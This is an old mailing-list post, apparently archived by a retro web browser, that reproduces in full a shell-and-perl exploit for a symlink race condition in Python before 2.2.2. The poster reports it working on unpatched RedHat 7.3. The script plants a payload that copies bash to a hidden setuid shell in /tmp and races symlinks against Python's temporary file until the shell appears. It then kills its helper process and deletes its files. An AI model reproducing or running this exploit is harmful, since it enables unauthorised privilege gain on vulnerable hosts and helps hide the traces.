Not to beat a dead horse, but the exploit code is published at:
http://www.ad2u.gr/index.php?topic=Exploits
It does work on my (unpatched vmware) RedHat 7.3. Although (as the
notice stated), it creates a suidshell as the user who runs the script,
not root. It also needs to be modified to use python2 on RedHat
Here's the code:
#!/bin/sh
echo "Python < 2.2.2 Symlink Race Condition exploit"
echo "Access-=-Denied Networks (c) mzozd@ad2u.gr, 2003"
echo "This is a proof of concept code!!! For educational purposes only"
evilcmd="#!/bin/sh\ncp /bin/bash /tmp/.sh\nchmod 4755 /tmp/.sh\n"
status="??"
echo "Creating suidshell script"
echo -e $evilcmd > /tmp/runme.sh
chmod 755 /tmp/runme.sh
perl -e 'while (1) { open ps,"ps -ef | grep -v grep | grep -v PID |";
while (<ps>) {@args = split " ", $_;if (/python/) {$args[2] = "@";
symlink("/tmp/runme.sh","/tmp/$args[2]$args[1].0");}}}'&
echo "Building python file..."
echo -e "import os\nos.execvpe('echo',['echo','-n','.'],os.environ)" >
/tmp/python.py
echo "Be patient, it will take a few moments"
while [ "$status" != "ok" ]
do
python /tmp/python.py
if test -e /tmp/.sh; then
status="ok"
fi
done
echo -e "\nYou got your suidshell..."
ls -al /tmp/.sh
echo "Cleaning environment"
killall -9 perl
rm -rf /tmp/runme.sh /tmp/*.0 /tmp/python.py
RetroSearch is an open source project built by @garambo | Open a GitHub Issue
Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo
HTML:
3.2
| Encoding:
UTF-8
| Version:
0.7.4